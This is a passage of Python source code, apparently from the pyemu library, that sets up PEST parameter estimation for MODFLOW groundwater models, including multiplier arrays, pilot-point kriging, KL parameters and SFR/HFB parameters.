self.spatial_list_props = spatial_list_props
self.spatial_list_geostruct = spatial_list_geostruct
if self.spatial_list_geostruct is None:
dist = 10 * float(max(self.m.dis.delr.array.max(),
self.m.dis.delc.array.max()))
v = pyemu.geostats.ExpVario(contribution=1.0, a=dist)
self.spatial_list_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="spatial_list_geostruct")
self.obssim_smp_pairs = obssim_smp_pairs
self.hds_kperk = hds_kperk
self.sfr_obs = sfr_obs
self.frun_pre_lines = []
self.frun_model_lines = []
self.frun_post_lines = []
self.tmp_files = []
self.extra_forward_imports = []
if tmp_files is not None:
if not isinstance(tmp_files, list):
tmp_files = [tmp_files]
self.tmp_files.extend(tmp_files)
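        # zonation: if k_zone_dict is not passed, default to using each layer's ibound array as the zone array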
if k_zone_dict is None:
self.k_zone_dict = {k: self.m.bas6.ibound[k].array for k in np.arange(self.m.nlay)}
else:
# check if k_zone_dict is a dictionary of dictionaries
if np.all([isinstance(v, dict) for v in k_zone_dict.values()]):
# loop over outer keys
for par_key in k_zone_dict.keys():
for k, arr in k_zone_dict[par_key].items():
if k not in np.arange(self.m.nlay):
self.logger.lraise("k_zone_dict for par {1}, layer index not in nlay:{0}".
format(k, par_key))
if arr.shape != (self.m.nrow, self.m.ncol):
                            self.logger.lraise("k_zone_dict arr for k {0} for par {2} has wrong shape:{1}".
                                               format(k, arr.shape, par_key))
else:
for k, arr in k_zone_dict.items():
if k not in np.arange(self.m.nlay):
self.logger.lraise("k_zone_dict layer index not in nlay:{0}".
format(k))
if arr.shape != (self.m.nrow, self.m.ncol):
self.logger.lraise("k_zone_dict arr for k {0} has wrong shape:{1}".
format(k, arr.shape))
self.k_zone_dict = k_zone_dict
# add any extra commands to the forward run lines
for alist, ilist in zip([self.frun_pre_lines, self.frun_model_lines, self.frun_post_lines],
[extra_pre_cmds, extra_model_cmds, extra_post_cmds]):
if ilist is None:
continue
if not isinstance(ilist, list):
ilist = [ilist]
for cmd in ilist:
self.logger.statement("forward_run line:{0}".format(cmd))
alist.append("pyemu.os_utils.run('{0}')\n".format(cmd))
# add the model call
if model_exe_name is None:
model_exe_name = self.m.exe_name
            self.logger.warn("using flopy binary to execute the model:{0}".format(model_exe_name))
if redirect_forward_output:
line = "pyemu.os_utils.run('{0} {1} 1>{1}.stdout 2>{1}.stderr')".format(model_exe_name, self.m.namefile)
else:
line = "pyemu.os_utils.run('{0} {1} ')".format(model_exe_name, self.m.namefile)
self.logger.statement("forward_run line:{0}".format(line))
self.frun_model_lines.append(line)
self.tpl_files, self.in_files = [], []
self.ins_files, self.out_files = [], []
self._setup_mult_dirs()
self.mlt_files = []
self.org_files = []
self.m_files = []
self.mlt_counter = {}
self.par_dfs = {}
self.mlt_dfs = []
self._setup_list_pars()
self._setup_array_pars()
if not sfr_pars and temporal_sfr_pars:
self.logger.lraise("use of `temporal_sfr_pars` requires `sfr_pars`")
if sfr_pars:
if isinstance(sfr_pars, str):
sfr_pars = [sfr_pars]
if isinstance(sfr_pars, list):
self._setup_sfr_pars(sfr_pars, include_temporal_pars=temporal_sfr_pars)
else:
self._setup_sfr_pars(include_temporal_pars=temporal_sfr_pars)
if hfb_pars:
self._setup_hfb_pars()
self.mflist_waterbudget = mflist_waterbudget
self.mfhyd = mfhyd
self._setup_observations()
self.build_pst()
if build_prior:
self.parcov = self.build_prior()
else:
self.parcov = None
self.log("saving intermediate _setup_<> dfs into {0}".
format(self.m.model_ws))
for tag, df in self.par_dfs.items():
df.to_csv(os.path.join(self.m.model_ws, "_setup_par_{0}_{1}.csv".
format(tag.replace(" ", '_'), self.pst_name)))
for tag, df in self.obs_dfs.items():
df.to_csv(os.path.join(self.m.model_ws, "_setup_obs_{0}_{1}.csv".
format(tag.replace(" ", '_'), self.pst_name)))
self.log("saving intermediate _setup_<> dfs into {0}".
format(self.m.model_ws))
self.logger.statement("all done")
def _setup_sfr_obs(self):
"""setup sfr ASCII observations"""
if not self.sfr_obs:
return
if self.m.sfr is None:
self.logger.lraise("no sfr package found...")
org_sfr_out_file = os.path.join(self.org_model_ws, "{0}.sfr.out".format(self.m.name))
if not os.path.exists(org_sfr_out_file):
self.logger.lraise("setup_sfr_obs() error: could not locate existing sfr out file: {0}".
format(org_sfr_out_file))
new_sfr_out_file = os.path.join(self.m.model_ws, os.path.split(org_sfr_out_file)[-1])
shutil.copy2(org_sfr_out_file, new_sfr_out_file)
seg_group_dict = None
if isinstance(self.sfr_obs, dict):
seg_group_dict = self.sfr_obs
df = pyemu.gw_utils.setup_sfr_obs(new_sfr_out_file, seg_group_dict=seg_group_dict,
model=self.m, include_path=True)
if df is not None:
self.obs_dfs["sfr"] = df
self.frun_post_lines.append("pyemu.gw_utils.apply_sfr_obs()")
def _setup_sfr_pars(self, par_cols=None, include_temporal_pars=None):
"""setup multiplier parameters for sfr segment data
Adding support for reachinput (and isfropt = 1)"""
assert self.m.sfr is not None, "can't find sfr package..."
if isinstance(par_cols, str):
par_cols = [par_cols]
reach_pars = False # default to False
seg_pars = True
par_dfs = {}
df = pyemu.gw_utils.setup_sfr_seg_parameters(
self.m, par_cols=par_cols,
include_temporal_pars=include_temporal_pars) # now just pass model
# self.par_dfs["sfr"] = df
if df.empty:
warnings.warn("No sfr segment parameters have been set up", PyemuWarning)
par_dfs["sfr"] = []
seg_pars = False
else:
par_dfs["sfr"] = [df] # may need df for both segs and reaches
self.tpl_files.append("sfr_seg_pars.dat.tpl")
self.in_files.append("sfr_seg_pars.dat")
if include_temporal_pars:
self.tpl_files.append("sfr_seg_temporal_pars.dat.tpl")
self.in_files.append("sfr_seg_temporal_pars.dat")
if self.m.sfr.reachinput:
# if include_temporal_pars:
# raise NotImplementedError("temporal pars is not set up for reach data style")
df = pyemu.gw_utils.setup_sfr_reach_parameters(self.m, par_cols=par_cols)
if df.empty:
warnings.warn("No sfr reach parameters have been set up", PyemuWarning)
else:
self.tpl_files.append("sfr_reach_pars.dat.tpl")
self.in_files.append("sfr_reach_pars.dat")
reach_pars = True
par_dfs["sfr"].append(df)
if len(par_dfs["sfr"]) > 0:
self.par_dfs["sfr"] = pd.concat(par_dfs["sfr"])
self.frun_pre_lines.append(
"pyemu.gw_utils.apply_sfr_parameters(seg_pars={0}, reach_pars={1})".format(seg_pars, reach_pars))
else:
warnings.warn("No sfr parameters have been set up!", PyemuWarning)
def _setup_hfb_pars(self):
"""setup non-mult parameters for hfb (yuck!)
"""
if self.m.hfb6 is None:
self.logger.lraise("couldn't find hfb pak")
tpl_file, df = pyemu.gw_utils.write_hfb_template(self.m)
self.in_files.append(os.path.split(tpl_file.replace(".tpl", ""))[-1])
self.tpl_files.append(os.path.split(tpl_file)[-1])
self.par_dfs["hfb"] = df
def _setup_mult_dirs(self):
""" setup the directories to use for multiplier parameterization. Directories
        are made within the PstFromFlopyModel.m.model_ws directory
"""
# setup dirs to hold the original and multiplier model input quantities
set_dirs = []
# if len(self.pp_props) > 0 or len(self.zone_props) > 0 or \
# len(self.grid_props) > 0:
if self.pp_props is not None or \
self.zone_props is not None or \
self.grid_props is not None or \
self.const_props is not None or \
self.kl_props is not None:
set_dirs.append(self.arr_org)
set_dirs.append(self.arr_mlt)
# if len(self.bc_props) > 0:
if len(self.temporal_list_props) > 0 or len(self.spatial_list_props) > 0:
set_dirs.append(self.list_org)
if len(self.spatial_list_props):
set_dirs.append(self.list_mlt)
for d in set_dirs:
d = os.path.join(self.m.model_ws, d)
self.log("setting up '{0}' dir".format(d))
if os.path.exists(d):
if self.remove_existing:
shutil.rmtree(d, onerror=remove_readonly)
else:
raise Exception("dir '{0}' already exists".
format(d))
os.mkdir(d)
self.log("setting up '{0}' dir".format(d))
    def _setup_model(self, model, org_model_ws, new_model_ws):
        """ setup the flopy.mbase instance for use with multiplier parameters.
Changes model_ws, sets external_path and writes new MODFLOW input
files
"""
split_new_mws = [i for i in os.path.split(new_model_ws) if len(i) > 0]
if len(split_new_mws) != 1:
self.logger.lraise("new_model_ws can only be 1 folder-level deep:{0}".
format(str(split_new_mws)))
if isinstance(model, str):
self.log("loading flopy model")
try:
import flopy
except:
raise Exception("from_flopy_model() requires flopy")
# prepare the flopy model
self.org_model_ws = org_model_ws
self.new_model_ws = new_model_ws
self.m = flopy.modflow.Modflow.load(model, model_ws=org_model_ws,
check=False, verbose=True, forgive=False)
self.log("loading flopy model")
else:
self.m = model
self.org_model_ws = str(self.m.model_ws)
self.new_model_ws = new_model_ws
self.log("updating model attributes")
self.m.array_free_format = True
self.m.free_format_input = True
self.m.external_path = '.'
self.log("updating model attributes")
if os.path.exists(new_model_ws):
if not self.remove_existing:
self.logger.lraise("'new_model_ws' already exists")
else:
                self.logger.warn("removing existing 'new_model_ws'")
shutil.rmtree(new_model_ws, onerror=pyemu.os_utils._remove_readonly)
time.sleep(1)
self.m.change_model_ws(new_model_ws, reset_external=True)
self.m.exe_name = self.m.exe_name.replace(".exe", '')
self.m.exe = self.m.version
self.log("writing new modflow input files")
self.m.write_input()
self.log("writing new modflow input files")
def _get_count(self, name):
""" get the latest counter for a certain parameter type.
"""
if name not in self.mlt_counter:
self.mlt_counter[name] = 1
c = 0
else:
c = self.mlt_counter[name]
self.mlt_counter[name] += 1
# print(name,c)
return c
    def _prep_mlt_arrays(self):
        """ prepare multiplier arrays. Copies existing model input arrays and
writes generic (ones) multiplier arrays
"""
par_props = [self.pp_props, self.grid_props,
self.zone_props, self.const_props,
self.kl_props]
par_suffixs = [self.pp_suffix, self.gr_suffix,
self.zn_suffix, self.cn_suffix,
self.kl_suffix]
# Need to remove props and suffixes for which no info was provided (e.g. still None)
del_idx = []
for i, cp in enumerate(par_props):
if cp is None:
del_idx.append(i)
for i in del_idx[::-1]:
del (par_props[i])
del (par_suffixs[i])
mlt_dfs = []
for par_prop, suffix in zip(par_props, par_suffixs):
if len(par_prop) == 2:
if not isinstance(par_prop[0], list):
par_prop = [par_prop]
if len(par_prop) == 0:
continue
for pakattr, k_org in par_prop:
attr_name = pakattr.split('.')[1]
pak, attr = self._parse_pakattr(pakattr)
ks = np.arange(self.m.nlay)
if isinstance(attr, flopy.utils.Transient2d):
ks = np.arange(self.m.nper)
try:
k_parse = self._parse_k(k_org, ks)
except Exception as e:
self.logger.lraise("error parsing k {0}:{1}".
format(k_org, str(e)))
org, mlt, mod, layer = [], [], [], []
c = self._get_count(attr_name)
mlt_prefix = "{0}{1}".format(attr_name, c)
mlt_name = os.path.join(self.arr_mlt, "{0}.dat{1}"
.format(mlt_prefix, suffix))
for k in k_parse:
# horrible kludge to avoid passing int64 to flopy
# this gift may give again...
if type(k) is np.int64:
k = int(k)
if isinstance(attr, flopy.utils.Util2d):
fname = self._write_u2d(attr)
layer.append(k)
elif isinstance(attr, flopy.utils.Util3d):
fname = self._write_u2d(attr[k])
layer.append(k)
elif isinstance(attr, flopy.utils.Transient2d):
fname = self._write_u2d(attr.transient_2ds[k])
layer.append(0) # big assumption here
mod.append(os.path.join(self.m.external_path, fname))
mlt.append(mlt_name)
org.append(os.path.join(self.arr_org, fname))
df = pd.DataFrame({"org_file": org, "mlt_file": mlt, "model_file": mod, "layer": layer})
df.loc[:, "suffix"] = suffix
df.loc[:, "prefix"] = mlt_prefix
df.loc[:, "attr_name"] = attr_name
mlt_dfs.append(df)
if len(mlt_dfs) > 0:
mlt_df = pd.concat(mlt_dfs, ignore_index=True)
return mlt_df
    def _write_u2d(self, u2d):
        """ write a flopy.utils.Util2d instance to an ASCII text file using the
        Util2d filename
"""
filename = os.path.split(u2d.filename)[-1]
np.savetxt(os.path.join(self.m.model_ws, self.arr_org, filename),
u2d.array, fmt="%15.6E")
return filename
    def _write_const_tpl(self, name, tpl_file, zn_array):
        """ write a template file for a constant (uniform) multiplier parameter
"""
parnme = []
with open(os.path.join(self.m.model_ws, tpl_file), 'w') as f:
f.write("ptf ~\n")
for i in range(self.m.nrow):
for j in range(self.m.ncol):
if zn_array[i, j] < 1:
pname = " 1.0 "
else:
pname = "{0}{1}".format(name, self.cn_suffix)
if len(pname) > 12:
self.logger.warn("zone pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
pname = " ~ {0} ~".format(pname)
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme}, index=parnme)
# df.loc[:,"pargp"] = "{0}{1}".format(self.cn_suffixname)
df.loc[:, "pargp"] = "{0}_{1}".format(self.cn_suffix.replace('_', ''), name)
df.loc[:, "tpl"] = tpl_file
return df
    def _write_grid_tpl(self, name, tpl_file, zn_array):
        """ write a template file for grid-based multiplier parameters
"""
parnme, x, y = [], [], []
with open(os.path.join(self.m.model_ws, tpl_file), 'w') as f:
f.write("ptf ~\n")
for i in range(self.m.nrow):
for j in range(self.m.ncol):
if zn_array[i, j] < 1:
pname = ' 1.0 '
else:
pname = "{0}{1:03d}{2:03d}".format(name, i, j)
if len(pname) > 12:
self.logger.warn("grid pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
pname = ' ~ {0} ~ '.format(pname)
x.append(self.m.sr.xcentergrid[i, j])
y.append(self.m.sr.ycentergrid[i, j])
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme, "x": x, "y": y}, index=parnme)
df.loc[:, "pargp"] = "{0}{1}".format(self.gr_suffix.replace('_', ''), name)
df.loc[:, "tpl"] = tpl_file
return df
def _grid_prep(self):
""" prepare grid-based parameterizations
"""
if len(self.grid_props) == 0:
return
if self.grid_geostruct is None:
            self.logger.warn("grid_geostruct is None," \
                             " using ExpVario with contribution=1 and a=(max(delc,delr)*10)")
dist = 10 * float(max(self.m.dis.delr.array.max(),
self.m.dis.delc.array.max()))
v = pyemu.geostats.ExpVario(contribution=1.0, a=dist)
self.grid_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="grid_geostruct", transform="log")
def _pp_prep(self, mlt_df):
""" prepare pilot point based parameterization
"""
if len(self.pp_props) == 0:
return
if self.pp_space is None:
self.logger.warn("pp_space is None, using 10...\n")
self.pp_space = 10
if self.pp_geostruct is None:
self.logger.warn("pp_geostruct is None," \
" using ExpVario with contribution=1 and a=(pp_space*max(delr,delc))")
pp_dist = self.pp_space * float(max(self.m.dis.delr.array.max(),
self.m.dis.delc.array.max()))
v = pyemu.geostats.ExpVario(contribution=1.0, a=pp_dist)
self.pp_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="pp_geostruct", transform="log")
pp_df = mlt_df.loc[mlt_df.suffix == self.pp_suffix, :]
layers = pp_df.layer.unique()
layers.sort()
pp_dict = {l: list(pp_df.loc[pp_df.layer == l, "prefix"].unique()) for l in layers}
# big assumption here - if prefix is listed more than once, use the lowest layer index
pp_dict_sort = {}
for i, l in enumerate(layers):
p = set(pp_dict[l])
pl = list(p)
pl.sort()
pp_dict_sort[l] = pl
for ll in layers[i + 1:]:
pp = set(pp_dict[ll])
d = list(pp - p)
d.sort()
pp_dict_sort[ll] = d
pp_dict = pp_dict_sort
pp_array_file = {p: m for p, m in zip(pp_df.prefix, pp_df.mlt_file)}
self.logger.statement("pp_dict: {0}".format(str(pp_dict)))
self.log("calling setup_pilot_point_grid()")
if self.use_pp_zones:
# check if k_zone_dict is a dictionary of dictionaries
if np.all([isinstance(v, dict) for v in self.k_zone_dict.values()]):
ib = {p.split('.')[-1]: k_dict for p, k_dict in self.k_zone_dict.items()}
for attr in pp_df.attr_name.unique():
if attr not in [p.split('.')[-1] for p in ib.keys()]:
if 'general_zn' not in ib.keys():
warnings.warn("Dictionary of dictionaries passed as zones, {0} not in keys: {1}. "
"Will use ibound for zones".format(attr, ib.keys()), PyemuWarning)
else:
self.logger.statement(
"Dictionary of dictionaries passed as pp zones, "
"using 'general_zn' for {0}".format(attr))
if 'general_zn' not in ib.keys():
ib['general_zn'] = {k: self.m.bas6.ibound[k].array for k in range(self.m.nlay)}
else:
ib = {'general_zn': self.k_zone_dict}
else:
ib = {}
for k in range(self.m.nlay):
a = self.m.bas6.ibound[k].array.copy()
a[a > 0] = 1
ib[k] = a
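            # replace any negative ibound values with the most common positive zone value so the kriging zone arrays are valid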
for k, i in ib.items():
if np.any(i < 0):
u, c = np.unique(i[i > 0], return_counts=True)
counts = dict(zip(u, c))
mx = -1.0e+10
imx = None
for u, c in counts.items():
if c > mx:
mx = c
imx = u
                    self.logger.warn("resetting negative ibound values for PP zone " + \
                                     "array in layer {0} : {1}".format(k+1, imx))
                    i[i < 0] = imx
ib[k] = i
ib = {'general_zn': ib}
pp_df = pyemu.pp_utils.setup_pilotpoints_grid(self.m,
ibound=ib,
use_ibound_zones=self.use_pp_zones,
prefix_dict=pp_dict,
every_n_cell=self.pp_space,
pp_dir=self.m.model_ws,
tpl_dir=self.m.model_ws,
shapename=os.path.join(
self.m.model_ws, "pp.shp"))
self.logger.statement("{0} pilot point parameters created".
format(pp_df.shape[0]))
self.logger.statement("pilot point 'pargp':{0}".
format(','.join(pp_df.pargp.unique())))
self.log("calling setup_pilot_point_grid()")
# calc factors for each layer
pargp = pp_df.pargp.unique()
pp_dfs_k = {}
fac_files = {}
pp_processed = set()
pp_df.loc[:, "fac_file"] = np.NaN
for pg in pargp:
ks = pp_df.loc[pp_df.pargp == pg, "k"].unique()
if len(ks) == 0:
self.logger.lraise("something is wrong in fac calcs for par group {0}".format(pg))
if len(ks) == 1:
if np.all([isinstance(v, dict) for v in ib.values()]): # check is dict of dicts
if np.any([pg.startswith(p) for p in ib.keys()]):
p = next(p for p in ib.keys() if pg.startswith(p))
# get dict relating to parameter prefix
ib_k = ib[p][ks[0]]
else:
p = 'general_zn'
ib_k = ib[p][ks[0]]
else:
ib_k = ib[ks[0]]
if len(ks) != 1: # TODO
# self.logger.lraise("something is wrong in fac calcs for par group {0}".format(pg))
self.logger.warn("multiple k values for {0},forming composite zone array...".format(pg))
ib_k = np.zeros((self.m.nrow, self.m.ncol))
for k in ks:
t = ib["general_zn"][k].copy()
t[t < 1] = 0
ib_k[t > 0] = t[t > 0]
k = int(ks[0])
kattr_id = "{}_{}".format(k, p)
kp_id = "{}_{}".format(k, pg)
if kp_id not in pp_dfs_k.keys():
self.log("calculating factors for p={0}, k={1}".format(pg, k))
fac_file = os.path.join(self.m.model_ws, "pp_k{0}.fac".format(kattr_id))
var_file = fac_file.replace(".fac", ".var.dat")
pp_df_k = pp_df.loc[pp_df.pargp == pg]
if kattr_id not in pp_processed:
self.logger.statement("saving krige variance file:{0}"
.format(var_file))
self.logger.statement("saving krige factors file:{0}"
.format(fac_file))
ok_pp = pyemu.geostats.OrdinaryKrige(self.pp_geostruct, pp_df_k)
ok_pp.calc_factors_grid(self.m.sr, var_filename=var_file, zone_array=ib_k, num_threads=10)
ok_pp.to_grid_factors_file(fac_file)
pp_processed.add(kattr_id)
fac_files[kp_id] = fac_file
self.log("calculating factors for p={0}, k={1}".format(pg, k))
pp_dfs_k[kp_id] = pp_df_k
for kp_id, fac_file in fac_files.items():
k = int(kp_id.split('_')[0])
pp_prefix = kp_id.split('_', 1)[-1]
# pp_files = pp_df.pp_filename.unique()
fac_file = os.path.split(fac_file)[-1]
# pp_prefixes = pp_dict[k]
# for pp_prefix in pp_prefixes:
self.log("processing pp_prefix:{0}".format(pp_prefix))
if pp_prefix not in pp_array_file.keys():
                self.logger.lraise("{0} not in pp_array_file.keys(): {1}".
                                   format(pp_prefix, ','.join(pp_array_file.keys())))
out_file = os.path.join(self.arr_mlt, os.path.split(pp_array_file[pp_prefix])[-1])
pp_files = pp_df.loc[pp_df.pp_filename.apply(
lambda x:
os.path.split(x)[-1].split(
'.')[0] == "{0}pp".format(pp_prefix)), 'pp_filename']
if pp_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of pp_files found:{0}".format(','.join(pp_files)))
pp_file = os.path.split(pp_files.iloc[0])[-1]
pp_df.loc[pp_df.pargp == pp_prefix, "fac_file"] = fac_file
pp_df.loc[pp_df.pargp == pp_prefix, "pp_file"] = pp_file
pp_df.loc[pp_df.pargp == pp_prefix, "out_file"] = out_file
pp_df.loc[:, "pargp"] = pp_df.pargp.apply(lambda x: "pp_{0}".format(x))
out_files = mlt_df.loc[mlt_df.mlt_file.
apply(lambda x: x.endswith(self.pp_suffix)), "mlt_file"]
# mlt_df.loc[:,"fac_file"] = np.NaN
# mlt_df.loc[:,"pp_file"] = np.NaN
for out_file in out_files:
pp_df_pf = pp_df.loc[pp_df.out_file == out_file, :]
fac_files = pp_df_pf.fac_file
if fac_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of fac files:{0}".format(str(fac_files.unique())))
fac_file = fac_files.iloc[0]
pp_files = pp_df_pf.pp_file
if pp_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of pp files:{0}".format(str(pp_files.unique())))
pp_file = pp_files.iloc[0]
mlt_df.loc[mlt_df.mlt_file == out_file, "fac_file"] = fac_file
mlt_df.loc[mlt_df.mlt_file == out_file, "pp_file"] = pp_file
self.par_dfs[self.pp_suffix] = pp_df
mlt_df.loc[mlt_df.suffix == self.pp_suffix, "tpl_file"] = np.NaN
def _kl_prep(self, mlt_df):
""" prepare KL based parameterizations
"""
if len(self.kl_props) == 0:
return
if self.kl_geostruct is None:
self.logger.warn("kl_geostruct is None," \
" using ExpVario with contribution=1 and a=(10.0*max(delr,delc))")
kl_dist = 10.0 * float(max(self.m.dis.delr.array.max(),
self.m.dis.delc.array.max()))
v = pyemu.geostats.ExpVario(contribution=1.0, a=kl_dist)
self.kl_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="kl_geostruct", transform="log")
kl_df = mlt_df.loc[mlt_df.suffix == self.kl_suffix, :]
layers = kl_df.layer.unique()
# kl_dict = {l:list(kl_df.loc[kl_df.layer==l,"prefix"].unique()) for l in layers}
# big assumption here - if prefix is listed more than once, use the lowest layer index
# for i,l in enumerate(layers):
# p = set(kl_dict[l])
# for ll in layers[i+1:]:
# pp = set(kl_dict[ll])
# d = pp - p
# kl_dict[ll] = list(d)
kl_prefix = list(kl_df.loc[:, "prefix"])
kl_array_file = {p: m for p, m in zip(kl_df.prefix, kl_df.mlt_file)}
self.logger.statement("kl_prefix: {0}".format(str(kl_prefix)))
fac_file = os.path.join(self.m.model_ws, "kl.fac")
self.log("calling kl_setup() with factors file {0}".format(fac_file))
kl_df = kl_setup(self.kl_num_eig, self.m.sr, self.kl_geostruct, kl_prefix,
factors_file=fac_file, basis_file=fac_file + ".basis.jcb",
tpl_dir=self.m.model_ws)
self.logger.statement("{0} kl parameters created".
format(kl_df.shape[0]))
self.logger.statement("kl 'pargp':{0}".
format(','.join(kl_df.pargp.unique())))
self.log("calling kl_setup() with factors file {0}".format(fac_file))
kl_mlt_df = mlt_df.loc[mlt_df.suffix == self.kl_suffix]
for prefix in kl_df.prefix.unique():
prefix_df = kl_df.loc[kl_df.prefix == prefix, :]
in_file = os.path.split(prefix_df.loc[:, "in_file"].iloc[0])[-1]
assert prefix in mlt_df.prefix.values, "{0}:{1}".format(prefix, mlt_df.prefix)
mlt_df.loc[mlt_df.prefix == prefix, "pp_file"] = in_file
mlt_df.loc[mlt_df.prefix == prefix, "fac_file"] = os.path.split(fac_file)[-1]
print(kl_mlt_df)
mlt_df.loc[mlt_df.suffix == self.kl_suffix, "tpl_file"] = np.NaN
self.par_dfs[self.kl_suffix] = kl_df
# calc factors for each layer
    def _setup_array_pars(self):
        """ main entry point for setting up array multiplier parameters
"""
mlt_df = self._prep_mlt_arrays()
if mlt_df is None:
return
mlt_df.loc[:, "tpl_file"] = mlt_df.mlt_file.apply(lambda x: os.path.split(x)[-1] + ".tpl")
# mlt_df.loc[mlt_df.tpl_file.apply(lambda x:pd.notnull(x.pp_file)),"tpl_file"] = np.NaN
mlt_files = mlt_df.mlt_file.unique()
# for suffix,tpl_file,layer,name in zip(self.mlt_df.suffix,
# self.mlt_df.tpl,self.mlt_df.layer,
# self.mlt_df.prefix):
par_dfs = {}
for mlt_file in mlt_files:
suffixes = mlt_df.loc[mlt_df.mlt_file == mlt_file, "suffix"]
if suffixes.unique().shape[0] != 1:
self.logger.lraise("wrong number of suffixes for {0}" \
.format(mlt_file))
suffix = suffixes.iloc[0]
tpl_files = mlt_df.loc[mlt_df.mlt_file == mlt_file, "tpl_file"]
if tpl_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of tpl_files for {0}" \
.format(mlt_file))
tpl_file = tpl_files.iloc[0]
layers = mlt_df.loc[mlt_df.mlt_file == mlt_file, "layer"]
# if layers.unique().shape[0] != 1:
# self.logger.lraise("wrong number of layers for {0}"\
# .format(mlt_file))
layer = layers.iloc[0]
names = mlt_df.loc[mlt_df.mlt_file == mlt_file, "prefix"]
if names.unique().shape[0] != 1:
self.logger.lraise("wrong number of names for {0}" \
.format(mlt_file))
name = names.iloc[0]
attr_names = mlt_df.loc[mlt_df.mlt_file == mlt_file, "attr_name"]
if attr_names.unique().shape[0] != 1:
self.logger.lraise("wrong number of attr_names for {0}".format(mlt_file))
attr_name = attr_names.iloc[0]
# ib = self.k_zone_dict[layer]
df = None
if suffix == self.cn_suffix:
self.log("writing const tpl:{0}".format(tpl_file))
# df = self.write_const_tpl(name,tpl_file,self.m.bas6.ibound[layer].array)
try:
df = write_const_tpl(name, os.path.join(self.m.model_ws, tpl_file), self.cn_suffix,
self.m.bas6.ibound[layer].array, (self.m.nrow, self.m.ncol), self.m.sr)
except Exception as e:
self.logger.lraise("error writing const template: {0}".format(str(e)))
self.log("writing const tpl:{0}".format(tpl_file))
elif suffix == self.gr_suffix:
self.log("writing grid tpl:{0}".format(tpl_file))
# df = self.write_grid_tpl(name,tpl_file,self.m.bas6.ibound[layer].array)
try:
df = write_grid_tpl(name, os.path.join(self.m.model_ws, tpl_file), self.gr_suffix,
self.m.bas6.ibound[layer].array, (self.m.nrow, self.m.ncol), self.m.sr)
except Exception as e:
self.logger.lraise("error writing grid template: {0}".format(str(e)))
self.log("writing grid tpl:{0}".format(tpl_file))
elif suffix == self.zn_suffix:
self.log("writing zone tpl:{0}".format(tpl_file))
if np.all([isinstance(v, dict) for v in self.k_zone_dict.values()]): # check is dict of dicts
if attr_name in [p.split('.')[-1] for p in self.k_zone_dict.keys()]:
k_zone_dict = next(k_dict for p, k_dict in self.k_zone_dict.items()
if p.split('.')[-1] == attr_name) # get dict relating to parameter prefix
else:
assert 'general_zn' in self.k_zone_dict.keys(), \
"Neither {0} nor 'general_zn' are in k_zone_dict keys: {1}".format(attr_name,
self.k_zone_dict.keys())
k_zone_dict = self.k_zone_dict['general_zn']
else:
k_zone_dict = self.k_zone_dict
# df = self.write_zone_tpl(self.m, name, tpl_file, self.k_zone_dict[layer], self.zn_suffix, self.logger)
try:
df = write_zone_tpl(name, os.path.join(self.m.model_ws, tpl_file), self.zn_suffix,
k_zone_dict[layer], (self.m.nrow, self.m.ncol), self.m.sr)
except Exception as e:
self.logger.lraise("error writing zone template: {0}".format(str(e)))
self.log("writing zone tpl:{0}".format(tpl_file))
if df is None:
continue
if suffix not in par_dfs:
par_dfs[suffix] = [df]
else:
par_dfs[suffix].append(df)
for suf, dfs in par_dfs.items():
self.par_dfs[suf] = pd.concat(dfs)
if self.pp_suffix in mlt_df.suffix.values:
self.log("setting up pilot point process")
self._pp_prep(mlt_df)
self.log("setting up pilot point process")
if self.gr_suffix in mlt_df.suffix.values:
self.log("setting up grid process")
self._grid_prep()
self.log("setting up grid process")
if self.kl_suffix in mlt_df.suffix.values:
self.log("setting up kl process")
self._kl_prep(mlt_df)
self.log("setting up kl process")
mlt_df.to_csv(os.path.join(self.m.model_ws, "arr_pars.csv"))
ones = np.ones((self.m.nrow, self.m.ncol))
for mlt_file in mlt_df.mlt_file.unique():
self.log("save test mlt array {0}".format(mlt_file))
np.savetxt(os.path.join(self.m.model_ws, mlt_file),
ones, fmt="%15.6E")
self.log("save test mlt array {0}".format(mlt_file))
tpl_files = mlt_df.loc[mlt_df.mlt_file == mlt_file, "tpl_file"]
if tpl_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of tpl_files for {0}" \
.format(mlt_file))
tpl_file = tpl_files.iloc[0]
if pd.notnull(tpl_file):
self.tpl_files.append(tpl_file)
self.in_files.append(mlt_file)
# for tpl_file,mlt_file in zip(mlt_df.tpl_file,mlt_df.mlt_file):
# if pd.isnull(tpl_file):
# continue
# self.tpl_files.append(tpl_file)
# self.in_files.append(mlt_file)
os.chdir(self.m.model_ws)
try:
apply_array_pars()
except Exception as e:
os.chdir("..")
self.logger.lraise("error test running apply_array_pars():{0}".
format(str(e)))
os.chdir("..")
line = "pyemu.helpers.apply_array_pars()\n"
self.logger.statement("forward_run line:{0}".format(line))
self.frun_pre_lines.append(line)
def _setup_observations(self):
""" main entry point for setting up observations
"""
obs_methods = [self._setup_water_budget_obs, self._setup_hyd,
self._setup_smp, self._setup_hob, self._setup_hds,
self._setup_sfr_obs]
obs_types = ["mflist water budget obs", "hyd file",
"external obs-sim smp files", "hob", "hds", "sfr"]
self.obs_dfs = {}
for obs_method, obs_type in zip(obs_methods, obs_types):
self.log("processing obs type {0}".format(obs_type))
obs_method()
self.log("processing obs type {0}".format(obs_type))
def draw(self, num_reals=100, sigma_range=6,use_specsim=False, scale_offset=True):
""" draw from the geostatistically-implied parameter covariance matrix
Args:
num_reals (`int`): number of realizations to generate. Default is 100
sigma_range (`float`): number of standard deviations represented by
the parameter bounds. Default is 6.
use_specsim (`bool`): flag to use spectral simulation for grid-based
parameters. Requires a regular grid but is wicked fast. Default is False
scale_offset (`bool`, optional): flag to apply scale and offset to parameter
bounds when calculating variances - this is passed through to
`pyemu.Cov.from_parameter_data`. Default is True.
Note:
            operates on parameters by groups to avoid having to construct a very large
            covariance matrix for problems with more than 30K parameters.
            uses `pyemu.helpers.geostatistical_draws()`
Returns:
`pyemu.ParameterEnsemble`: The realized parameter ensemble
